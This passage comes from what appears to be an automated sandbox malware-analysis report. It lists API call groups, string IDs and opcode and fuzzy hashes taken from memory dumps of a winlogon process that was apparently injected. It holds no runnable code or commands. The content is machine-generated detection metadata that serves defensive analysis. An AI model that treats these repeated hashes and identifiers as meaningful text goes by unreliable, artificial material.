                                                  • FlsGetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD087
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0A6
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0CE
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0DF
                                                  • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0F0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value
                                                  • String ID: 1%$Y%
                                                  • API String ID: 3702945584-1395475152
                                                  • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction ID: aa2ce87c2e5d08cf880b526a954400d7df811dd07e48bc34c2f6fbcce052a6f2
                                                  • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                  • Instruction Fuzzy Hash: 94113A317296C4CAFA68A735D9953FDF2416F847E1F285236AC2E076EADE2C84028600
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 424e5fee986169b2588fd60a7070510afe7af99a9e5ea540af609b12983588fe
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: 1C818B396282C1EFFB50AB65D8813EDF790AF85B82F14463BAD0C47796DE38C8458700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction ID: 0874071610b75d78b137934d7bb3787c1ea270a088fa8bad8bb2fa6638c7f79b
                                                  • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                  • Instruction Fuzzy Hash: 4231A23133AAC1E9EE12DB52E4407DDB394BF48BA1F5905369D1E0B791EF39C4658310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction ID: e4881fcce3081a0d908705cf576626470a6a90982aea8447793606719cd19703
                                                  • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                  • Instruction Fuzzy Hash: 27115B32320AC0C6E7519B52E84439DFBA0FB88FE5F04422AEE5E87795CF39C8148744
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: dialer
                                                  • API String ID: 756756679-3528709123
                                                  • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction ID: 22a39d6ef88b58d550097a84837a798e4384e01285b2469e00f0ad5875fd8a3e
                                                  • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction Fuzzy Hash: FD319F32725B95CAEA15DF96E5407ADFBA0FF44B82F0840369E4D47B59EF39C4A18700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction ID: 1e0e9e661ea968faf47e5f9be1ba74f7c3a50c914e5506e2edc612bc17e3d70d
                                                  • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction Fuzzy Hash: B9115C312292C4CAFA64A771D5953FDF2526F897F6F14473AAC3F476DADE6884018600
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction ID: 8204dbe928e9efd943141ece04bc6ced883a62c760999c7dfaa781505eec1141
                                                  • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction Fuzzy Hash: FF010531324AC0C6EA54DB52E89879DB7A5BB88BC5F88403ADE4E43755DE3DC989C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction ID: e932fd6f93206b82514f0fe06f897a1b8c5f29290dfd6fa6980646282d759e98
                                                  • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction Fuzzy Hash: 1C011B753257C0CAEB259B62E84879DB7A0BF49B86F04043ACD4E17755EF3DC5088704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                  • Instruction ID: 5270aa4372cfd9b7b3a25713a09ade675b46112c9520692bc64e2f6ee0a834c5
                                                  • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                  • Instruction Fuzzy Hash: 4D519B32739682CEEB15CB15E848B9DB7A6FB45B89F108536DE0A47788EF75C841D700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction ID: 95a1c83f90eb46ab096ca1721357a1fe3062f153325f5557bc07c7ce8fdb596f
                                                  • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction Fuzzy Hash: 3DF03C323246C5D2EB609B61F8D479DBB60FB88B89F844036DE4D46959DE2DC68DCB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction ID: 001b9bb6c93794229350e6c80cd0198086eb55aa025ef2e010eccad3773778ae
                                                  • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction Fuzzy Hash: F3F06D71225AC4C2FB108B29E8443ADB720FF89BA1F54462BDE6E462E4CF2EC549C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction ID: 54657fac72875be1a94e19342f383fea5c2671d0b244a7b4eb32911dde1a2f06
                                                  • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction Fuzzy Hash: 43F05830228BC0C2EA008B52F9082ADBBA0AF48FC0F088136EE4E07B19DE2CC4498700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                  • Instruction ID: e979bb5767f17a5875adf326a5af591250b36e9f9924a585dba8a17403db4fee
                                                  • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                  • Instruction Fuzzy Hash: F461B476629B84CAE7609B55E48439EF7A0FB88795F500126EA8E47BA8DF7CC440CF04
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 5ae2b81b01df07d095a8c6f67efdb50be62736a34741f5bf77a128705f7f4416
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 6411A336A30ED1D2FA641D28E4413EDB1836F5CB74F48A73AAD6F466E6DE24C8417102
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: f42d5f5a704ddb6eb0c576794086d780c79e25a3ea788a9c9f775ae5c7c9e848
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: AC11A3B2B30BD092F6645569D4623EDBB407F783B8F0A0636BDBE076D6CE26C8414301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                  • API String ID: 3215553584-4202648911
                                                  • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction ID: c085a7186edd0bd96b3b5f96f8b8f0c801fd9b3b4f1f589b90990ea3c2410778
                                                  • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction Fuzzy Hash: 9A61C2327206C2C6FA659B64E5403EEF6A1EF85794F54653BCE0E17BA6DF34C8468B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: d19808ae33988bda2650a5844b5d1748d42811ed884e7eddb2be384cf9521a74
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: 06614532629B84CAEB20DF65D4803DDB7A1FB48B89F044226EE8D17B98DF38D595C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 8b88985d8a19d565553951c9a4f98d0a05d5b30a49fe722d51b10b02fba8460f
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 185146332206C2CAEB748B25D54479CB7E0FB55B94F188227DE9D87A95CF39D491CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: 04f104a1198cfe77e9f18ad21fa7f3ffbc06d51044aeee31fab7197b13b47274
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 085149722292C0CEEB648B25D5843DDB7E0EB94B96F184127DE9D47AD5CF38D490CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: 969eefac54521e2ab512f8dcd0a7caf11298dcb48de377119434fb7e3a9081bd
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: 9751CE32721282CAEB14CB25E405BDDB799FB50B98F508176DE0E63788EF39CC418B24
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction ID: 354f9a0964b41297c1ff2c31b1f1025270f73fa256f3a12dbaa3ee87bf0d0c62
                                                  • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction Fuzzy Hash: DF31BC32221781D6E714DF21E845BDEB7A9FB40B88F458026EE9E53B88DF39C941CB14
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction ID: 4a834175d774d777cb47a958f8acb45f37ceab2a92498808f5a7062e48617104
                                                  • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction Fuzzy Hash: F5D1BE32724A80CAE711CFA9D4403ECBBB1FB54B98F144226DE5E97B99DE35C506C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction ID: d0a60abff6c19dd014d05dd9f9736618db482ff87e777856ee8a457250a06e81
                                                  • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction Fuzzy Hash: CF014C32624AD0CAD705EFA6E90428EBBA1FB8DF82F05443AEE4D43719DE38C051C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction ID: ca626266aa0a7b474a878b61d5899873dc42c35356b0549f9cccd0328b52c02c
                                                  • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction Fuzzy Hash: 23918C72620AD0C9F7659FA5D8903EDFFA0BB45B88F54412BDE0E67A95DE36C482C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction ID: 276b10aab837e175542a230bfec2f0a123e9c9319c4b0de011574a2981c74ca1
                                                  • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                  • Instruction Fuzzy Hash: 5E111836721F81CAEB00DBA0E8543AC73A4FB19759F440E36DE6D867A5DF78D1988380
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction ID: 0b3dc21db449fcbf1c19d302490e59a14833865d5b2b70b353a7510e9e64bdbc
                                                  • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction Fuzzy Hash: 9771BF362287C1CDE6249AA9D8843EEF791FF89B86F440037DD0E53B89DE35D5418704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: 613368ca26f5213a448d05eae5b26de1d91f394644821e2679e3739e87edce54
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: 07612633620A86CAEB24DF65D4403DDBBA0FB44B88F144226EE4E17B99DF38D595CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction ID: db0d46813ac5e8fd5f39f756d67a1fcb3148512911a86185a8375fd33465d585
                                                  • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction Fuzzy Hash: 8B51D03222C3C1C9E665DAA9E4583EEF792FB85792F440136DE5E03B99CE39C9048740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction ID: 86a7781e38c697fc0abcbd8b7a322b6ea8dd4ce0b7b2c3ea935c5dab76c89125
                                                  • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction Fuzzy Hash: 83415C72625A80C6EB209B65E8443EDFBA1FB98B94F504136EE4E87794EF39C441CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction ID: b3421d11e61861fdfaec7805ab92e2b149d9a2defd5c3d3a43f6ba353e8bbdff
                                                  • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction Fuzzy Hash: D7112B32228B8086EB618B15E44039EB7E5FB88B95F584236EE8C07758EF3DC551CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000035.00000002.3352188390.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_53_2_1e858980000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: ierarchy Descriptor'$riptor at (
                                                  • API String ID: 592178966-758928094
                                                  • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction ID: ec66882b4d3ae1b64dd5078d85d2ddc26122b5e01e13c0459ee6ee22340de03e
                                                  • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction Fuzzy Hash: 12E08671650B85D0EF018F21E8402DC73A1DF58B64F8891339D5C06311FE38D1E9C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
